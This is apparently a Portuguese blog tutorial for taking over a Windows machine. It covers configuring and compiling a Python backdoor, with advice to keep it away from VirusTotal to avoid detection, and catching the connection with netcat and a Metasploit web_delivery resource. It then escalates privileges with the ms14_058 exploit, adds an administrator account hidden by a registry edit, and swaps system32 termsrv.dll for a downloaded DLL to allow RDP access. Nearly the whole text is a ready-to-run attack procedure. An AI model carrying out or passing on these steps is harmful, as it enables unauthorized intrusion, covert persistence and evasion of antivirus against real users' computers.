1 - Verifique seu ip, você pode usar esse script em python: https://github.com/msOlivers/PacketofScripts/tree/master/myIpPython ou em http://whatismyipaddress.com/
2 - Baixe o Simples Backdoor em:
- https://github.com/msOlivers/PacketofScripts/tree/master/simpleBackdoorPython
- Edite as linhas HOST com seu IP e a PORT com uma de sua preferencia
Use judiciously
Do NOT upload VirusTotal or similiar websites
Do NOT upload public websites
Do NOT send the file via e-mail
Not following the above rules may result in:
Your tests might be compromised
--------------------------------------------------------
Use criteriosamente
NÃO faça upload do arquivo para VirusTotal ou sites parecidos
NÃO carregue o arquivo para sites públicos
NÃO enviar o arquivo via e-mail
Não seguir as regras acima pode resultar em:
Seus testes pode ser comprometido
3 - Compile para exe usando py2exe, Como instalar o python e py2exe:
- https://www.youtube.com/watch?v=qDYkxGdhPkw
5 - Execulte o netcat modo de esculta:
- nc -lvp numeroDaPorta
- Resource: https://github.com/msOlivers/PacketofScripts/blob/master/web_delivery/web_delivery.rc
- edite com suas configurações
- execulte com msfconsole -r nome do seu recurso.rc -q
- aguarde e copie o resultado web delivery
8 - Va para o terminal do msfconsole e veja uma nova sessaão e entre nela para fazer a Escalonamento de privilégios, Comandos:
- sessions -i 1
- meterpreter > sysinfo - ver infomacao do alvo
- meterpreter > getsystem - ver privilegios
- meterpreter > getuid - ver nivel de usuario
- meterpreter > background
- msf exploit(web_delivery) > use exploit/windows/local/ms14_058_track_popup_menu
- msf exploit(ms14_058_track_popup_menu) > set SESSION 1
- msf exploit(ms14_058_track_popup_menu) > set TARGET 0
- msf exploit(ms14_058_track_popup_menu) > set ExitOnSession false
- msf exploit(ms14_058_track_popup_menu) > set LHOST SEU_IP
- msf exploit(ms14_058_track_popup_menu) > set LPORT SUA_PORTA
- msf exploit(ms14_058_track_popup_menu) > run
10 - Adicionar um novo usuario oculto no alvo, Comando:
- meterpreter > shel
- cmd > net user NovoUsuario Senha_Usuario /add
- cmd > net localgroup Administradores NovoUsuario /add
- cmd > reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v NovoUsuario /t REG_DWORD /d 0 /f
- cmd > exit
- Obtenha a DLL(para windows 32 bits) no link: http://www.4shared.com/file/MLfeIwoeba/termsrv.html
- meterpreter > pwd
- meterpreter > cd ..
- meterpreter > upload /root/termsrv.dll termsrv.dll
- meterpreter > shell
- cmd > MOVE /Y "%SYSTEMROOT%\system32\termsrv.dll" "%systemdrive%\termsrv.bak"
- cmd > MOVE /Y termsrv.dll "C:\Windows\system32\
- xfreerdp /v:192.168.1.6 /u:NovoUsuario /w:800 /h:600
- https://github.com/FreeRDP/FreeRDP - para mais informação
Não negue conhecimento, Compartilhe essa ideia com mais pessoas, para que outros possam aprender
Video
Comentários
Postar um comentário